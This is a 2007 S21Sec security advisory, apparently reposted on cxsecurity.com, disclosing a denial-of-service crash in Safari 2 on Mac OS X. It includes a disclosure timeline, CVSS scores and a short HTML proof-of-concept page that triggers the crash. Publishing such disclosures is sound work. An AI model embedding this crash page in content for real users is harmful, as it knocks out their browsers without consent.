Safari 2 Remote Denial of Service

2008.01.17
Credit: David Barroso
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-20


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

##############################################################
                      - S21Sec Advisory -
##############################################################

Title:     Safari 2 Denial of Service
ID:        S21SEC-039-en
Severity:  Medium - Remote DoS
History:   15.Jul.2007 Vulnerability discovered
           22.Jul.2007 Vendor contacted
           27.Jul.2007 Vendor confirmed the vulnerability
           26.Oct.2007 Safari 3 in Leopard
           14.Nov.2007 Safari 3 in Tiger
Scope:     Remote Denial of Service
Platforms: MacOSX
Author:    David Barroso (dbarroso (at) s21sec (dot) com)
URL:       http://www.s21sec.com/avisos/s21sec-039-en.txt
Release:   Public

[ SUMMARY ]

According to Wikipedia, Safari is a web browser developed by Apple Inc. and included in Mac OS X. It was first released as a public beta on January 7, 2003, as the default browser in Mac OS X v10.3. A beta version for Microsoft Windows was released for the first time on June 11, 2007, with support for Windows XP and Windows Vista.

[ AFFECTED VERSIONS ]

The following versions are affected by this issue:

- Safari Version 2 (MacOSX Version)

[ DESCRIPTION ]

A crafted HTML page can make Safari crash while parsing the page, due to improper input validation in the KHTML/WebKit rendering engine. The trigger is a form containing a hidden (display:none) div that wraps a table, followed by a text input.

Example:

    <html>
      <head>
        <title>Safari Exploit</title>
      </head>
      <body>
        <form>
          <div id="foo" style="display:none;">
            <table>
              <tr>
                <td></td>
              </tr>
            </table>
          </div>
          <input type="text" />
        </form>
      </body>
    </html>

[ WORKAROUND ]

The vulnerability was patched in Safari 3, officially released in October 2007 (Leopard) and November 2007 (Tiger). Upgrading to Safari 3 removes the issue.

[ ACKNOWLEDGMENTS ]

This vulnerability has been found and researched by:

- David Barroso <dbarroso (at) s21sec (dot) com>
  S21sec labs

[ REFERENCES ]

* Wikipedia. Safari
  http://en.wikipedia.org/wiki/Safari_%28web_browser%29
* Safari
  http://www.apple.com/safari/
* S21Sec
  http://www.s21sec.com
* Blog S21sec
  http://blog.s21sec.com


Copyright 2021, cxsecurity.com
